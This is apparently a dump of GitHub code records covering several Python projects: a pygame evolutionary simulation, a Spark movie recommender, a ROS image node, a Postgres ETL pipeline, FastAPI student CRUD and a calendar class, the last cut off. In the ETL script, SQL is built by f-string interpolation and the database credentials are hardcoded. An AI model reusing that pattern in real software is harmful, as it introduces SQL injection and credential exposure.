m*x1\r\n \r\n counter = 0\r\n \r\n #falls kein Punkt unter der Funktion -> fertig -> break?\r\n for z in range(len(Gelenke_Koordinaten_Liste)):\r\n x3 = Gelenke_Koordinaten_Liste[z][0]\r\n y3 = Gelenke_Koordinaten_Liste[z][1]\r\n #Wenn ein Punkt unter der Gerade ist:\r\n if round(y3,1) > round((m*x3 + q),1):\r\n #print(\"con:\",round(y3,1),round((m*x3 + q),1), round((m*x3 + q),1)-round(y3,1))\r\n #weitersuchen\r\n pass\r\n else:\r\n #Funktion (m, q) und Gelenke (p1, p2) gefunden: \r\n counter += 1\r\n pass\r\n \r\n if counter == len(Gelenke_Koordinaten_Liste):\r\n #Gelenke, die den Boden berühren\r\n pygame.draw.line(screen, (255,0,0), (links_von_S[p1][0],links_von_S[p1][1]),(rechts_von_S[p2][0],rechts_von_S[p2][1]),1)\r\n a = (links_von_S[p1][0],links_von_S[p1][1])\r\n b = (rechts_von_S[p2][0],rechts_von_S[p2][1])\r\n #gravity((links_von_S[p1][0],links_von_S[p1][1]),(rechts_von_S[p2][0],rechts_von_S[p2][1]),m, population_nr, frame_nr)\r\n #Welche Gelenk-Nummer in der Gelenk-Liste\r\n z1, z2 = p1, len(links_von_S)+p2\r\n return m2, a, b, z1, z2\r\n switch = 0\r\n else:\r\n pass\r\n \r\n\r\ndef boden(laenge, breite):\r\n pygame.draw.line(screen, (0,0,0), (0, y_boden),(laenge,y_boden),3)\r\n\r\ndef draw_gelenke(x,y):\r\n pygame.draw.circle(screen, (0, 0, 0), (x,y), 4)\r\n \r\n\r\ndef draw(population_nr, frame):\r\n global population, draw_points, turning_angles, x_offset\r\n gelenke_pos = []\r\n gelenke_collision = []\r\n gelenke_winkel = []\r\n \r\n if frame == 1:\r\n gelenke_pos.append(startpunkt)\r\n status = population[population_nr][4]\r\n else:\r\n gelenke_pos.append(population[population_nr][3][0])\r\n status = population[population_nr][5]\r\n \r\n \r\n #Für alle Flächen eines Objektes\r\n for k in range(len(population[population_nr][1])): \r\n #Für die erste Fläche\r\n \r\n #Biegung der Gelenke? => Blockiert oder nicht?\r\n if status[k-1][0] == 1:\r\n alpha = population[population_nr][2][k-1]*(humidity_level(frame)/100)\r\n else: \r\n #Winkel blockiert!\r\n frame2 = status[k-1][1]\r\n #Winkel-Blockierung aufheben?\r\n num = int(frame / 252)\r\n if 252-(frame2-num*252) < frame-num*252:\r\n alpha = population[population_nr][2][k-1]*(humidity_level(frame)/100)\r\n status[k-1] = (1, 0)\r\n else:\r\n #immer noch blockiert\r\n alpha = population[population_nr][2][k-1]*(humidity_level(frame2)/100)\r\n \r\n P1x = gelenke_pos[-1][0]\r\n P1y = gelenke_pos[-1][1]\r\n \r\n \r\n P2x = math.cos(math.radians(alpha))*population[population_nr][1][k] #-beta\r\n P2y = math.sin(math.radians(alpha))*population[population_nr][1][k] #-beta\r\n #Ort des Punkt n wird durch vorherigen Punkt n-1 berechnet und zur Gelenke-Liste hinzugefügt\r\n gelenke_pos.append((P1x+P2x,P1y-P2y))\r\n #Gelenk und Fläche wird berechnet\r\n draw_gelenke(P1x+P2x,P1y-P2y)\r\n pygame.draw.line(screen, (0,0,0), (P1x,P1y),(P1x+P2x,P1y-P2y),3) #surface, color, p1, p2, width\r\n \r\n #letzte Fläche hinzugefügt => fertig\r\n if k+1 == faltflaechen:\r\n fitness = 0\r\n if frame > 6:\r\n fitness_evaluation = []\r\n for o in range(len(population[population_nr][3])):\r\n fitness_evaluation.append(population[population_nr][3][o][0])\r\n \r\n fitness = round((max(fitness_evaluation)-startpunkt[0]-sum_laenge)/frame,3)\r\n if population[population_nr][6] > fitness:\r\n fitness = population[population_nr][6]\r\n else:\r\n pass\r\n population[population_nr] = (population[population_nr][0],population[population_nr][1],population[population_nr][2],gelenke_pos, gelenke_collision, status,fitness) \r\n if frame == zyklen*252-2:\r\n print(\"Print to csv:\",population[population_nr][1])\r\n print(\"UND:\", [population[population_nr][6]])\r\n fitness2 = [population[population_nr][6]]\r\n print_csv([population[population_nr][1],hygroskopizität,fitness2],0)\r\n \r\n #checking for collision\r\n for k in range(len(population[population_nr][3])-1):\r\n x1 = population[population_nr][3][k][0]\r\n y1 = population[population_nr][3][k][1]\r\n x2 = population[population_nr][3][k+1][0]\r\n y2 = population[population_nr][3][k+1][1]\r\n collision(population_nr, (x1,y1),(x2,y2), k, frame)\r\n #SP berechnen\r\n sp_calc((x1,y1),(x2,y2),k, population_nr, frame)\r\n \r\n if frame > 5:\r\n \r\n draw_points=[]\r\n for i in range(faltflaechen+1):\r\n draw_points.append(\" \")\r\n gravity(population_nr, frame)\r\n try:\r\n for i in range(len(draw_points)):\r\n population[population_nr][3][i] = (draw_points[i][0]+x_offset, draw_points[i][1])\r\n population[population_nr][2][i] = population[population_nr][2][i]-math.degrees(turning_angles)\r\n except:\r\n pass\r\n #print(population[population_nr])\r\n\r\n##################################\r\n#LOOP\r\ngeneration_nr = 0\r\nprint(generations)\r\nwhile generation_nr < generations:\r\n generation_nr += 1\r\n if generation_nr == 1:\r\n population_limit = population_limit\r\n else: \r\n population_limit = nr_in_generation\r\n for i in range(population_limit):\r\n print(\"Generation\",generation_nr, \"Objekt\", i)\r\n frame = 0\r\n population = []\r\n hygroskopizität = []\r\n sum_laenge = 0\r\n while True: #game loop\r\n screen.fill((255,255,255))\r\n frame += 1\r\n \r\n #Simulation finished?\r\n if frame > zyklen*252:\r\n \r\n pop_nr = pop_nr + 1\r\n plot_animation(0)\r\n break\r\n # if pop_nr >= population_limit: \r\n # pygame.quit()\r\n # sys.exit()\r\n \r\n #X pressed?\r\n for event in pygame.event.get():\r\n if event.type == QUIT: #if X is clicked on the window\r\n pygame.quit() #stops pygame\r\n sys.exit() #stops the hole code\r\n \r\n \r\n #beginnning of simulation\r\n if frame == 1:\r\n startpopulation(populationsnum, i)\r\n print(\"Startpopulation\")\r\n print(population)\r\n \r\n boden(laenge, breite) \r\n #Für jedes Populationsmitglied\r\n for j in range(0,len(population)):\r\n draw(j, frame) \r\n \r\n \r\n \r\n pygame.display.update()\r\n clock.tick(fps_) #frame rate : 60 fps\r\n \r\n population2 = []\r\n population = []\r\n sel_reco_mut()\r\n if generation_nr+1 == generations:\r\n plot_animation(1)\r\n print(\"KONTROLLE:\", population2)\r\n #print(population2)\r\n #mit Exemplare von Population2 weitermachen!!!","repo_name":"GameMakerPremium/MA_Evolutionary_Algorithm","sub_path":"FINISHED_2.py","file_name":"FINISHED_2.py","file_ext":"py","file_size_in_byte":33003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3068149926","text":"import sys\r\nfrom pyspark import SparkConf, SparkContext\r\nfrom math import sqrt\r\nimport numpy as np\r\ndef loadMovieNames():\r\n movieNames = {}\r\n movieGenres = {}\r\n with open(\"./ml-100k/u.ITEM\", encoding='ascii', errors='ignore') as f:\r\n for line in f:\r\n fields = line.replace('\\n','').split('|')\r\n movieNames[int(fields[0])] = fields[1]\r\n genres = [ int(i) for i in fields[5:]]\r\n movieGenres[int(fields[0])] = genres\r\n return movieNames, movieGenres\r\n\r\n#Python 3 doesn't let you pass around unpacked tuples,\r\n#so we explicitly extract the ratings now.\r\ndef makePairs( userRatings ):\r\n ratings = userRatings[1]\r\n (movie1, rating1) = ratings[0]\r\n (movie2, rating2) = ratings[1]\r\n return ((movie1, movie2), (rating1, rating2))\r\n\r\ndef shared_genre(m1,m2):\r\n # print(m1)\r\n # print(m2)\r\n return bool(np.dot(m1,m2))\r\n\r\n\r\ndef filterDuplicates( userRatings ):\r\n ratings = userRatings[1]\r\n (movie1, rating1) = ratings[0]\r\n (movie2, rating2) = ratings[1]\r\n return movie1 < movie2\r\n\r\ndef computeCosineSimilarity(ratingPairs):\r\n numPairs = 0\r\n sum_xx = sum_yy = sum_xy = 0\r\n for ratingX, ratingY in ratingPairs:\r\n sum_xx += ratingX * ratingX\r\n sum_yy += ratingY * ratingY\r\n sum_xy += ratingX * ratingY\r\n numPairs += 1\r\n\r\n numerator = sum_xy\r\n denominator = sqrt(sum_xx) * sqrt(sum_yy)\r\n\r\n score = 0\r\n if (denominator):\r\n score = (numerator / (float(denominator)))\r\n\r\n return (score, numPairs)\r\n\r\n\r\nconf = SparkConf().setMaster(\"local[*]\").set(\"spark.driver.host\",'localhost').setAppName(\"MovieSimilarities\")\r\nsc = SparkContext(conf = conf)\r\n\r\nprint(\"\\nLoading movie names...\")\r\nnameDict, genre_dict = loadMovieNames()\r\n# print(genre_dict)\r\ndata = sc.textFile(\"./ml-100k/u.data\")\r\n\r\n\r\n# Map ratings to key / value pairs: user ID => movie ID, rating\r\nratings = data.map(lambda l: l.split()).map(lambda l: (int(l[0]), (int(l[1]), float(l[2]))))\r\n\r\n# r = ratings.take(10)\r\n# for rating in r:\r\n# print(rating)\r\n\r\n#Convert to average centered ratings\r\nonly_ratings = ratings.map(lambda l: (l[1][0], l[1][1]))\r\nonly_ratings = only_ratings.groupByKey().mapValues(lambda x: np.sum([i for i in x])/len([i for i in x]))\r\n# orr = only_ratings.take(10)\r\n# print(orr)\r\n# exit()\r\nratings_dict = { i:j for i,j in only_ratings.collect()}\r\n# print('ratings dict:')\r\n# print(ratings_dict)\r\naverage_rating_dict = sc.broadcast(ratings_dict)\r\n\r\nratings = ratings.mapValues(lambda l: (l[0], l[1] - average_rating_dict.value[l[0]]))\r\n\r\n\r\ndef CosineSimilarityWithGenreScale(line):\r\n numPairs = 0\r\n sum_xx = sum_yy = sum_xy = 0\r\n movie1 = line[0][0]\r\n movie2 = line[0][1]\r\n ratingPairs = line[1]\r\n for ratingX, ratingY in ratingPairs:\r\n sum_xx += ratingX * ratingX\r\n sum_yy += ratingY * ratingY\r\n sum_xy += ratingX * ratingY\r\n numPairs += 1\r\n\r\n numerator = sum_xy\r\n denominator = sqrt(sum_xx) * sqrt(sum_yy)\r\n genre_metric = np.dot(genre_dict[movie1],genre_dict[movie2])/(np.sum(genre_dict[movie1]) + np.sum(genre_dict[movie2]))\r\n\r\n score = 0\r\n if (denominator):\r\n score = genre_metric * (numerator / (float(denominator)))\r\n\r\n return ((movie1,movie2),(score, numPairs))\r\n\r\ndef CosineSimilarityWithCoRatings(line):\r\n numPairs = 0\r\n sum_xx = sum_yy = sum_xy = 0\r\n movie1 = line[0][0]\r\n movie2 = line[0][1]\r\n ratingPairs = line[1]\r\n for ratingX, ratingY in ratingPairs:\r\n sum_xx += ratingX * ratingX\r\n sum_yy += ratingY * ratingY\r\n sum_xy += ratingX * ratingY\r\n numPairs += 1\r\n\r\n numerator = sum_xy\r\n denominator = sqrt(sum_xx) * sqrt(sum_yy)\r\n ratings_metric = np.log(len([i for i in ratingPairs])/10)\r\n score = 0\r\n if (denominator):\r\n score = ratings_metric * (numerator / (float(denominator)))\r\n\r\n return ((movie1,movie2),(score, numPairs))\r\n\r\n# Emit every movie rated together by the same user.\r\n# Self-join to find every combination.\r\njoinedRatings = ratings.join(ratings)\r\n\r\n# At this point our RDD consists of userID => ((movieID, rating), (movieID, rating))\r\n\r\n# Filter out duplicate pairs\r\nuniqueJoinedRatings = joinedRatings.filter(filterDuplicates)\r\n\r\n# Now key by (movie1, movie2) pairs.\r\nmoviePairs = uniqueJoinedRatings.map(makePairs)\r\n\r\n# We now have (movie1, movie2) => (rating1, rating2)\r\n# Now collect all ratings for each movie pair and compute similarity\r\nmoviePairRatings = moviePairs.groupByKey()\r\n\r\n# We now have (movie1, movie2) = > (rating1, rating2), (rating1, rating2) ...\r\n# Can now compute similarities.\r\n# moviePairSimilarities = moviePairRatings.mapValues(computeCosineSimilarity).cache()\r\n# print(moviePairRatings.take(10))\r\n# exit()\r\nmoviePairSimilarities = moviePairRatings.map(CosineSimilarityWithCoRatings).cache()\r\n\r\n# Save the results if desired\r\n#moviePairSimilarities.sortByKey()\r\n#moviePairSimilarities.saveAsTextFile(\"movie-sims\")\r\n\r\ndef result_filter(pairSim):\r\n t1 = (pairSim[0][0] == movieID)\r\n t2 = (pairSim[0][1] == movieID)\r\n t11 = False\r\n if(t1):\r\n t11 = shared_genre(genre_dict[pairSim[0][1]],genre_dict[movieID])\r\n if(t2):\r\n t11 = shared_genre(genre_dict[pairSim[0][0]],genre_dict[movieID])\r\n\r\n t3 = pairSim[1][0] > scoreThreshold \r\n t4 = pairSim[1][1] > coOccurenceThreshold\r\n #Average rating threshold\r\n t5 = average_rating_dict.value[movieID] > average_rating_threshold\r\n #At least one shared genre threshold\r\n if((t1 or t2) and t11 and t3 and t4 and t5):\r\n return True\r\n\r\n return False\r\n# Extract similarities for the movie we care about that are \"good\".\r\nif (len(sys.argv) > 1):\r\n\r\n scoreThreshold = 0.01\r\n coOccurenceThreshold = 25\r\n average_rating_threshold = 2\r\n movieID = int(sys.argv[1])\r\n\r\n # Filter for movies with this sim that are \"good\" as defined by\r\n # our quality thresholds above\r\n # filteredResults = moviePairSimilarities.filter(lambda pairSim: \\\r\n # (pairSim[0][0] == movieID or pairSim[0][1] == movieID) \\\r\n # and pairSim[1][0] > scoreThreshold and pairSim[1][1] > coOccurenceThreshold)\r\n\r\n filteredResults = moviePairSimilarities.filter(result_filter) \r\n\r\n # Sort by quality score.\r\n results = filteredResults.map(lambda pairSim: (pairSim[1], pairSim[0])).sortByKey(ascending = False).take(10)\r\n\r\n print(\"Top 10 similar movies for \" + nameDict[movieID])\r\n # print(genre_dict[movieID])\r\n for result in results:\r\n (sim, pair) = result\r\n # Display the similarity result that isn't the movie we're looking at\r\n similarMovieID = pair[0]\r\n if (similarMovieID == movieID):\r\n similarMovieID = pair[1]\r\n print(nameDict[similarMovieID] + \"\\tscore: \" + str(sim[0]) + \"\\tstrength: \" + str(sim[1]))\r\n # print(genre_dict[similarMovieID])\r\n","repo_name":"rajkshah3/spark","sub_path":"spark_course/movie-similarities-pearson.py","file_name":"movie-similarities-pearson.py","file_ext":"py","file_size_in_byte":6827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16127865724","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport roslib\nroslib.load_manifest('teleoperation')\nimport sys\nimport rospy\nimport cv2\nimport numpy as np\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import CompressedImage\nfrom sensor_msgs.msg import Joy\n\nclass image_converter:\n def __init__(self):\n self.image_pub = rospy.Publisher(\"image_topic_2\", CompressedImage)\n self.image_sub = rospy.Subscriber(\"/usb_cam/image_raw/compressed\", CompressedImage, self.callback, queue_size = 1)\n self.joy_sub = rospy.Subscriber(\"/joy\", Joy ,self.joyCallback)\n self.black_screen = True\n\n def callback(self, data):\n np_arr = np.fromstring(data.data, np.uint8)\n image_np = cv2.imdecode(np_arr, cv2.CV_LOAD_IMAGE_GRAYSCALE)\n image_height, image_width = image_np.shape[:2]\n # Crop image\n image_np = image_np[0.5*image_height-120:0.5*image_height+150, 0.5*image_width-160:0.5*image_width+160]\n\n # Enable fullscreen\n cv2.namedWindow(\"test\", cv2.WND_PROP_FULLSCREEN) \n cv2.setWindowProperty(\"test\", cv2.WND_PROP_FULLSCREEN, cv2.cv.CV_WINDOW_FULLSCREEN)\n\n # Draw lines\n image_height, image_width = image_np.shape[:2]\n center_x = int(0.5*image_width)\n center_y = int(0.5*image_height)\n '''\n cv2.circle(image_np, \n center = (center_x, center_y), \n radius = 10, \n color = 0, \n thickness = 5) \n '''\n cv2.line(image_np, (center_x, center_y+10), (center_x, center_y-10), color = 255)\n cv2.line(image_np, (center_x+10, center_y), (center_x-10, center_y), color = 255)\n #cv2.rectangle(image_np, (center_x-140, center_y-120), (center_x+140, center_y+120), color = 255, thickness = 1)\n cv2.rectangle(image_np, (center_x-60, center_y-60), (center_x+60, center_y+60), color = 255, thickness = 1)\n \n\n if (self.black_screen):\n image_np = np.zeros_like(image_np)\n cv2.imshow(\"test\", image_np)\n cv2.waitKey(3)\n\n # Create compressedImage #\n msg = CompressedImage()\n msg.header.stamp = rospy.Time.now()\n msg.format = \"jpeg\"\n msg.data = np.array(cv2.imencode('.jpg', image_np)[1]).tostring()\n self.image_pub.publish(msg)\n \n def joyCallback(self, data):\n if(data.buttons[1]):\n self.black_screen = not(self.black_screen)\n rospy.loginfo(self.black_screen)\n\ndef main(args):\n ic = image_converter()\n rospy.init_node('image_converter', anonymous=True)\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"dmgongora/teleoperation","sub_path":"src/cvnode_simple.py","file_name":"cvnode_simple.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10123538244","text":"import psycopg2\nimport pandas as pd\nimport numpy as np\n\n# database and dwh configuration\nhostname = 'localhost'\ndatabase = 'beni_and_sons'\ndwh = 'data_warehous'\nusername = 'admin'\npwd = 'admin'\nport_id = 5432\n\n\n# extract data from beni_and_sons database into a dataframe objects\ndef extract():\n conn = None\n cur = None\n try:\n conn = psycopg2.connect(\n host=hostname,\n dbname=database,\n user=username,\n password=pwd,\n port=port_id\n )\n cur = conn.cursor()\n cur.execute(\"SELECT version();\")\n record = cur.fetchone()\n print(\"You are connected to - \", database, record, \"\\n\")\n fact_df = create_df(cur,\n \"select recruiter.id as recruiter_id, applicant.id as applicant_id, \"\n \"recruiter.departmant_id \" \n \", applicant.application_date, recruitment.recruitment_date, bonus.bonus_amount FROM \"\n \"applicant FULL JOIN recruiter ON \" \n \"applicant.recruiter_id = recruiter.id FULL JOIN recruitment ON applicant.id = \"\n \"recruitment.applicant_id LEFT JOIN \" \n \"bonus ON bonus.month = CAST((SPLIT_PART(recruitment.recruitment_date::TEXT, '-', \"\n \"2))AS INTEGER) \")\n fact_df['bonus_amount'] = fact_df['bonus_amount'].replace(np.nan, 0)\n fact_df['recruitment_date'] = fact_df['recruitment_date'].astype(str)\n fact_df['application_date'] = fact_df['application_date'].astype(str)\n applicant_df = create_df(cur, \"select id, city, birth_date, family_status FROM applicant\")\n departmant_df = create_df(cur, \"SELECT id, name FROM departmant\")\n recruiter_df = create_df(cur, \"SELECT id, city, birth_date, family_status, base_salary FROM recruiter\")\n load(fact_df, applicant_df, departmant_df, recruiter_df)\n\n except Exception as error:\n print(error)\n finally:\n if cur is not None:\n cur.close()\n if conn is not None:\n conn.close()\n\n\ndef load(fact_df, applicant_df, departmant_df, recruiter_df):\n conn = None\n cur = None\n try:\n conn = psycopg2.connect(\n host=hostname,\n dbname=dwh,\n user=username,\n password=pwd,\n port=port_id\n )\n cur = conn.cursor()\n cur.execute(\"SELECT version();\")\n record = cur.fetchone()\n print(\"You are connected to - \", dwh, record, \"\\n\")\n\n for row, data in applicant_df.iterrows():\n [id, city, birth_date, family_status] = data.get([\"id\", \"city\", \"birth_date\", \"family_status\"])\n cur.execute(\n f\"INSERT INTO dim_applicant (id, city, birth_date, family_status) VALUES ({id}, '{city}',\"\n f\"'{birth_date}','{family_status}') ON CONFLICT ON CONSTRAINT dim_applicant_pkey DO UPDATE SET\"\n f\"city='{city}', birth_date ='{birth_date}', family_status = '{family_status}' \")\n print(cur.statusmessage)\n print(cur.query)\n conn.commit()\n\n for row, data in recruiter_df.iterrows():\n [id, city, birth_date, family_status, base_salary] = data.get(\n [\"id\", \"city\", \"birth_date\", \"family_status\", \"base_salary\"])\n cur.execute(\n f\"INSERT INTO dim_recruiter (id, city, birth_date, family_status, base_salary) VALUES\"\n f\"({id}, '{city}', '{birth_date}', '{family_status}', {base_salary})\"\n f\"ON CONFLICT ON CONSTRAINT dim_recruiter_pkey DO UPDATE SET city='{city}',\"\n f\"birth_date ='{birth_date}', family_status = '{family_status}' , base_salary = {base_salary}\")\n print(cur.statusmessage)\n print(cur.query)\n conn.commit()\n\n for row, data in departmant_df.iterrows():\n [id, name] = data.get([\"id\", \"name\"])\n cur.execute(\n f\"INSERT INTO dim_departmant (id, name) VALUES ({id}, '{name}') ON CONFLICT ON CONSTRAINT \"\n f\"dim_departmant_pkey DO NOTHING\")\n print(cur.statusmessage)\n print(cur.query)\n conn.commit()\n\n for row, data in fact_df.iterrows():\n print(data)\n cur.execute(\n f\"INSERT INTO recruitment_process_fact (recruiter_id, applicant_id, department_id, application_date, \"\n f\"status, recruitment_date, bonus) VALUES ({data[0]}, {data[1]}, {data[2]}, '{data[3]}',\"\n f\"{False if data[4] == 'None' else True}, '{data[4]}',{data[5]}) ON CONFLICT ON CONSTRAINT \"\n f\"recruitment_process_fact_pkey DO UPDATE SET recruiter_id = {data[0]}, department_id={data[2]}, \"\n f\"application_date='{data[3]}', status={False if data[4] == 'None' else True}, recruitment_date='\"\n f\"{data[4]}', bonus={data[5]}\")\n print(cur.statusmessage)\n print(cur.query)\n conn.commit()\n\n except Exception as error:\n print(error)\n finally:\n if cur is not None:\n cur.close()\n if conn is not None:\n conn.close()\n\n\ndef create_df(cur, query):\n cur.execute(query)\n data = cur.fetchall()\n cols = []\n for elt in cur.description:\n cols.append(elt[0])\n return pd.DataFrame(data=data, columns=cols)\n\n\nextract()\n","repo_name":"flAdar/Beni_and_sons_test","sub_path":"ETL_Pipeline.py","file_name":"ETL_Pipeline.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16749602907","text":"from sqlalchemy.orm import Session\nfrom .. import models, schemas,database\nfrom fastapi import HTTPException,status\nfrom . import address\nfrom .. utils import list_address_utils,student_List_Utils\n# from ..hashing import Hash\n\n\ndatabases = database.database\n\ndef get_all_students(db: Session,limit:int = 100,skip :int = 0):\n students = db.query(models.Student).offset(skip).limit(limit).all()\n student_list = []\n for student in students:\n address_list=list_address_utils(student.id,db)\n student_list.append(student_List_Utils(student,address_list))\n return student_list\n\ndef create(request: schemas.ShowStudent,db:Session):\n new_student = models.Student(\n student_name = request.student_name,\n student_class = request.student_class,\n student_session = request.student_session\n )\n db.add(new_student)\n db.commit() \n db.refresh(new_student)\n if new_student:\n if address.create(new_student.id, request.addresses,db):\n return True\n return False\n\ndef get_student_by_id(id:int,db:Session):\n student = db.query(models.Student).filter(models.Student.id == id).first()\n address_list=list_address_utils(student.id,db)\n student_detail=student_List_Utils(student,address_list)\n if not student_detail:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Student with the id {id} is not available\")\n return student_detail\n\ndef destroy(id:int,db: Session):\n student = db.query(models.Student).filter(models.Student.id == id)\n addresses = db.query(models.Address).filter(models.Address.s_id == id)\n for add in addresses:\n address.destroy(add.id,db)\n student.delete(synchronize_session=False)\n db.commit()\n return True\n\n\ndef update(id:int,request:schemas.StudentBase, db:Session):\n student = db.query(models.Student).filter(models.Student.id == id)\n if not student:\n raise HTTPException(status_code=404, detail=f\"Student with {id} not found\")\n update_data = {\n \"student_name\" : request.student_name,\n\t\t\"student_class\" : request.student_class,\n\t\t\"student_session\" : request.student_session\n }\n student.update(update_data)\n db.commit()\n if student:\n if address.update(id, request.addresses,db):\n return True\n return False \n\n\n \n\n\n","repo_name":"CpAswanthMG/MG-Student-Project","sub_path":"api/repository/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38102763722","text":"# module is function in python we can import ur module in exitsting file for use\r\n# can create another file and import it here by using module function\r\nfrom Calc import *\r\na=1\r\nb=2\r\nx=sum(a,b)\r\ny=sub(a,b)\r\nz=mul(a,b)\r\nc=div(a,b)\r\nprint(x,y,z,c)","repo_name":"sagar-demo/Python","sub_path":"Module1.py","file_name":"Module1.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3432166103","text":"from datetime import date\nimport calendar\n\n# needed to psss test - test_show_Monthly_Calender\ncalendar.setfirstweekday(6)\n\nimport numpy as np\nfrom copy import deepcopy\n\n\nclass Calender(object):\n\n def __init__(self):\n self.year = None\n self.month = None\n self.day = None\n self.today_WeekDay = None\n self.events = []\n self.reccuringEvents = []\n self.setToday()\n\n def setToday(self):\n the_date = date.today()\n today = str(the_date) # ex. '1-1-2015' => numbers=[1,1,2015]\n numbers = [int(n) for n in today.split('-')]\n self.setCurrentYearMonthDay(numbers)\n self.today_WeekDay = calendar.day_name[the_date.weekday()]\n\n def setCurrentYearMonthDay(self, numbers):\n self.year = numbers[0]\n self.month = numbers[1]\n self.day = numbers[2]\n\n def getToday(self):\n the_date_for_today = {\n \"month\": self.month,\n \"day\": self.day,\n \"year\": self.year\n }\n return the_date_for_today\n\n def daysThisMonth(self, month, year):\n if month == 12:\n return (date(year+1, 1, 1) - date(year, month, 1)).days\n else:\n return (date(year, month+1, 1) - date(year, month, 1)).days\n\n def convertDayToWeekDayName(self, day, month, year):\n the_date = date(year, month, day)\n return calendar.day_name[the_date.weekday()]\n\n def startAndEndOfMonth(self, month, year):\n start = self.convertDayToWeekDayName(1, month, year)\n lastDay = self.daysThisMonth(month, year)\n end = self.convertDayToWeekDayName(lastDay, month, year)\n return start, end\n\n def howManyRowsForMonth(self, month, year):\n start_date_name, end_date_name = self.startAndEndOfMonth(month, year)\n days = self.daysThisMonth(month, year)\n amount = days / 7\n\n if end_date_name == \"Sunday\":\n return amount + 2\n return amount + 1\n\n def showMonth(self, year, month):\n calendar.setfirstweekday(6)\n return calendar.monthcalendar(year, month)\n\n def dayNameToNumber(self, dayName):\n days = {\"Sunday\": 1, \"Monday\": 2, \"Tuesday\": 3, \"Wednesday\": 4,\n \"Thursday\": 5, \"Friday\": 6, \"Saturday\": 7\n }\n\n return days[dayName]\n\n def getNumOfWeeks_startWeekday_endWeekday_TotaldaysOf(self, month, year):\n number_of_weeks = self.howManyRowsForMonth(month, year)\n start, end = self.startAndEndOfMonth(month, year)\n total_Days = self.daysThisMonth(month, year)\n return number_of_weeks, start, end, total_Days\n\n def setUpWeek(self):\n week_Json = {\"Sunday\": {}, \"Monday\": {},\n \"Tuesday\": {},\n \"Wednesday\": {}, \"Thursday\": {}, \"Friday\": {},\n \"Saturday\": {}\n }\n week_list = ['Sunday', \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\",\n \"Friday\", \"Saturday\"\n ]\n weekNumber = 1\n count = 1\n return week_Json, week_list, weekNumber, count\n\n def buildMonthlyCalender(self, month, year):\n if month > 12 or month < 1:\n return None\n\n number_of_weeks, start, end, total_Days = \\\n self.getNumOfWeeks_startWeekday_endWeekday_TotaldaysOf(month, year)\n week_Json, week_list, weekNumber, count = self.setUpWeek()\n\n neededInfo = [number_of_weeks, weekNumber,\n week_list, start, count, total_Days]\n return self.buildingTheDictionayOfMonthlyCal(neededInfo)\n\n def buildingTheDictionayOfMonthlyCal(self, neededInfo):\n number_of_weeks = neededInfo[0]\n weekNumber = neededInfo[1]\n week_list = neededInfo[2]\n start = neededInfo[3]\n count = neededInfo[4]\n total_Days = neededInfo[5]\n\n monthlyCalender = {}\n for x in range(number_of_weeks):\n monthlyCalender[weekNumber] = {}\n for day in week_list:\n if weekNumber == 1:\n if self.dayNameToNumber(day) >= \\\n self.dayNameToNumber(start):\n monthlyCalender[weekNumber][day] = {'date': count}\n count = count + 1\n else:\n monthlyCalender[weekNumber][day] = {'date': 0}\n else:\n if count > total_Days:\n monthlyCalender[weekNumber][day] = {'date': 0}\n else:\n monthlyCalender[weekNumber][day] = {'date': count}\n count += 1\n weekNumber += 1\n return monthlyCalender\n\n def addEventToCalender(self, month, day, year, event):\n stringDate = \"{}-{}-{}\".format(month, day, year)\n event['date'] = stringDate\n self.events.append(event)\n\n def eventsForDay(self, month, day, year):\n stringDate = \"{}-{}-{}\".format(month, day, year)\n\n allEvents = {'events': {}}\n COUNT = 1\n for item in self.events:\n if item['date'] == stringDate:\n eventNumber = COUNT\n allEvents['events'][eventNumber] = item\n COUNT = COUNT + 1\n\n if allEvents == {'events': {}}:\n return None\n else:\n return allEvents\n\n def get_week_of_month(self, year, month, day):\n x = np.array(calendar.monthcalendar(year, month))\n week_of_month = np.where(x == day)[0][0] + 1\n return week_of_month\n\n def addReccuringEventToCalender(self, dayOfWeek, howOften, eventToAdd):\n eventToAdd['dayOfweek'] = dayOfWeek\n eventToAdd['occurrence'] = howOften\n self.reccuringEvents.append(eventToAdd)\n\n def reccuringEventsForMonth(self, month, year, monthlyCall=None):\n self.month = month\n self.year = year\n days = calendar.monthrange(year, month)\n if monthlyCall is None:\n hold = []\n\n for event in self.reccuringEvents:\n dayOfweek = event['dayOfweek']\n howManyTimesDayOfWeekIsInMonth, theDaysThatMatch = \\\n self.numberOfTimesDayisInMOnth(days, dayOfweek)\n\n for weekNumber in range(howManyTimesDayOfWeekIsInMonth):\n exactdate = theDaysThatMatch[weekNumber]\n eventCopy = deepcopy(event)\n del eventCopy['occurrence']\n del eventCopy['dayOfweek']\n\n eventCopy['date'] = '{}-{}-{}'.format(month, exactdate, year)\n if monthlyCall:\n monthlyCall[weekNumber+1][dayOfweek][1] = eventCopy\n else:\n hold.append(eventCopy)\n if monthlyCall is None:\n return hold\n else:\n return monthlyCall\n\n def showMonthCalender(self, month, year):\n monthlyCal = self.buildMonthlyCalender(month, year)\n for event in self.events:\n date = event['date']\n numbers = [int(n) for n in date.split('-')]\n event_date = {\"day\": numbers[1], \"month\": numbers[0],\n \"year\": numbers[2]\n }\n NameOfTheWeekDay = \\\n self.convertDayToWeekDayName(event_date['day'],\n event_date['month'],\n event_date['year'])\n weekNumberInMonth = self.get_week_of_month(event_date['year'],\n event_date['month'],\n event_date['day']\n )\n infoNeeded = 